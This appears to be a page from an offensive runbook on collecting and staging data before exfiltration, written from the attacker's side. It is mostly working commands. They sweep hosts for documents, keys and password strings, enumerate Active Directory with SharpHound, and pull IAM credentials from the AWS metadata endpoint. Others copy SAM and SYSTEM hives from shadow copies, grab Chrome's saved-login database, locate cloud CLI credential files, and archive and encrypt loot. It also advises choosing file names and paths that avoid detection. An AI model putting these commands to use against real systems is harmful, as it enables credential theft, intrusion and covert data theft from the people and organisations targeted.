Collection techniques¶
Before exfiltrating data, attackers consolidate and stage it. Effective collection is methodical: understand the environment, identify what is worth taking, gather it with minimal noise.
Automated data discovery¶
Crawling for high-value files uses either built-in tooling or custom scripts. Common targets: financial records, intellectual property, HR data, credentials, configuration files, and private keys.
# PowerShell: find Office documents, PDFs, and config files
Get-ChildItem -Path C:\Users -Recurse -Include *.docx,*.xlsx,*.pdf,*.json,*.xml,*.config `
-ErrorAction SilentlyContinue |
Where-Object { $_.Length -lt 50MB } |
Select-Object FullName, Length, LastWriteTime |
Export-Csv -Path C:\Temp\filelist.csv -NoTypeInformation
# Linux: find recently modified sensitive files
find /home /etc /var/www -type f \( -name "*.conf" -o -name "*.key" -o -name "*.pem" \
-o -name "*.csv" -o -name "*.sql" \) -newer /etc/passwd 2>/dev/null
For keyword-based discovery within documents, use native indexing or grep-style tools:
# search for credential patterns in text files
grep -rli "password\|secret\|api_key\|token\|BEGIN.*PRIVATE" /home /etc 2>/dev/null
Network and environment mapping¶
Mapping the internal network before lateral movement or collection. Knowing what exists is prerequisite to knowing what to take.
# Active Directory: enumerate users, computers, and last logon
Get-ADComputer -Filter * | Select-Object Name, DNSHostName, OperatingSystem
Get-ADUser -Filter * -Properties LastLogonDate | Select-Object SamAccountName, LastLogonDate
# BloodHound: ingest AD data via SharpHound for attack path analysis
.\SharpHound.exe -c All --outputdirectory C:\Temp\
# results in C:\Temp\*.json: import into BloodHound
Cloud instance metadata provides credentials for the attached IAM role without any authentication:
# AWS instance metadata (accessible from any process on the instance)
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
ROLE=$(curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/)
curl -s "http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE"
Credential harvesting¶
LSASS memory¶
Extracting credentials from LSASS requires local admin or SYSTEM. Modern environments run Credential Guard which blocks plaintext password extraction, but NTLM hashes and Kerberos tickets remain accessible.
The credential harvesting techniques are covered in detail in the credential harvesting runbook.
SAM database¶
The SAM database contains local account hashes. Offline extraction from a volume shadow copy avoids touching LSASS:
# copy SAM and SYSTEM hive from shadow copy without touching LSASS
vssadmin list shadows
$shadow = '\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1'
cmd /c "copy $shadow\Windows\System32\config\SAM C:\Temp\SAM"
cmd /c "copy $shadow\Windows\System32\config\SYSTEM C:\Temp\SYSTEM"
# extract hashes offline with secretsdump.py or similar
Browser credential stores¶
Browsers store saved credentials in encrypted databases. Extraction requires running as the target user (DPAPI context):
# Chrome login data
$src = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data"
Copy-Item $src C:\Temp\chrome_login.db
# extract with a tool that handles DPAPI decryption
Cloud CLI credential files¶
# check for stored cloud credentials (plaintext or DPAPI-encrypted)
$paths = @(
"$env:USERPROFILE\.aws\credentials",
"$env:USERPROFILE\.azure\accessTokens.json",
"$env:APPDATA\gcloud\credentials.db"
)
$paths | Where-Object { Test-Path $_ } | ForEach-Object { Write-Output "Found: $_" }
SaaS and cloud collection¶
Once identity is controlled, collection from SaaS platforms uses the platform’s own APIs. This is covered in the SaaS harvesting runbook.
Staging before exfiltration¶
Collected data needs to be staged: compressed, possibly encrypted, and placed somewhere that can be exfiltrated without leaving a trail of individual file accesses:
# compress a staged collection to a temp directory
Compress-Archive -Path C:\Temp\collected -DestinationPath C:\Temp\out.zip
# Linux: archive and optionally encrypt
tar czf /tmp/staged.tgz /tmp/collected/
# or with encryption:
tar czf - /tmp/collected/ | openssl enc -aes-256-cbc -pass pass:KEY -out /tmp/staged.enc
Use paths and filenames that blend into the environment: C:\Windows\Temp\,
/tmp/, and filenames matching legitimate system activity.